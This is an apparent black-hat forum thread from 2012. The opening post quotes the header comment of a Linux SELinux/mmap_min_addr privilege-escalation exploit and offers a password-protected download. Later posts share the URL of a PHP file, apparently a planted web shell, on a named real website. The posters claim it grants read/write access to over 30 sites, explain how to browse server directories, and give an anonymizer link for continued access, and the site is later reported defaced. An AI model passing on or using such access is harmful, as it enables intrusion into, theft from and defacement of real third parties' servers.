

Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
11-10-2012, 05:28 AM
(This post was last modified: 11-10-2012 06:21 AM by frostbite.)
Post: #1
|
|||
|
|||
[GET] Access Black Hole In Website - Server Exploit - ALL CONTENT REVEALED - NO BS - EXTREMELY SENSITIVE INFO
This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3. * The problem, first noticed by Brad Spengler, was described by Red Hat in * Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and * the mmap_min_addr protection[2]. * * Support for i386 and x86_64 was added for completeness. For a more complete * implementation, refer to Brad Spengler's exploit[3], which also implements * the personality trick[4] published by Tavis Ormandy and Julien Tinnes. ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() To Access All The Files Within you will have to browse through the Collection... 1. Download the small file here Magic Button : 3. Have Fun With It! PASSWORD TO THE FILE [hide]bestblackhatforum.com[/hide] ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() By the way please understand that you have direct access to all files and please do not modify any files lest you know what you are doing Its too late now... the file has been removed by the owner of the website or by someone here that has removed the file... |
|||
11-10-2012, 05:35 AM
Post: #2
|
|||
|
|||
RE:
And just what the f**k are we supposed to do with this?
Code: http://100dollarsadayin30days.com/wp-content/uploads/optpress/images_comingsoon/2012090716-15-05cache_1328066839.php# |
|||
11-10-2012, 05:36 AM
(This post was last modified: 11-10-2012 05:39 AM by frostbite.)
Post: #3
|
|||
|
|||
RE:
you are welcome
please dont bash me for sharing with the community (11-10-2012 05:35 AM)ArnieAbrams Wrote: you will see the ".." that means click it to go up one directory higher til you get to the root directory and you will see |
|||
11-10-2012, 05:42 AM
(This post was last modified: 11-10-2012 05:43 AM by raimhotep.)
Post: #4
|
|||
|
|||
RE:
(11-10-2012 05:35 AM)ArnieAbrams Wrote: And just what the f**k are we supposed to do with this?lololololololololololololololol I was wondering the same thing seem like a new language. Thanks for the effort Frostbite ![]() ![]() |
|||
11-10-2012, 05:50 AM
(This post was last modified: 11-10-2012 05:52 AM by frostbite.)
Post: #5
|
|||
|
|||
RE:
Some people still dont know exactly what I have shared...
Let me explain.... You have remote access with read write permissions to over 30 websites take a closer look I can now download the plugin Wp Traffic Control by go to this directory /home/mannntas/public_html/100dollarsadayin30days.com/wp-content/uploads/ drwxr-xr-x [ home ] what you would then do is go to the directory in your browser and you can download whatever you want withing that directory for instance in this directory click here to find out [hide]http://100dollarsadayin30days.com/wp-content/uploads/[/spoiler] |
|||
11-10-2012, 06:24 AM
(This post was last modified: 11-10-2012 06:39 AM by frostbite.)
Post: #6
|
|||
|
|||
RE:
The caching system seems to be generating the file automatically and then clearing the cache as of right now the file is no longer available
By going to the main page you will see this ![]() Hacked By Metropolis ************************************************************************************************************** ************************************************************************************************************** Metropolis you didnt hack anything... I just give you the resources to do so.... ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
|||
11-10-2012, 06:41 AM
Post: #7
|
|||
|
|||
RE:
hey frostbite,
thx for sharing, this will be helpful for me ! But most of the people here won't understand what are all this explanation, as they are only IM (?) they don't know what are server management, nor read and write permissions... |
|||
11-10-2012, 07:36 AM
Post: #8
|
|||
|
|||
RE:
Quote:Its too late now... the file has been removed by the owner of the website or by someone here that has removed the file... Oh I just read your last sentence. I am too late :/ |
|||
11-10-2012, 03:26 PM
(This post was last modified: 11-10-2012 03:35 PM by newwave.)
Post: #9
|
|||
|
|||
RE:
Actually u guys can still have access browsing the directory by using the following
[hide]anonym.to/?http://100dollarsadayin30days.com/wp-content/uploads/optpress/[/spoiler] |
|||
11-10-2012, 03:28 PM
Post: #10
|
|||
|
|||
RE: | |||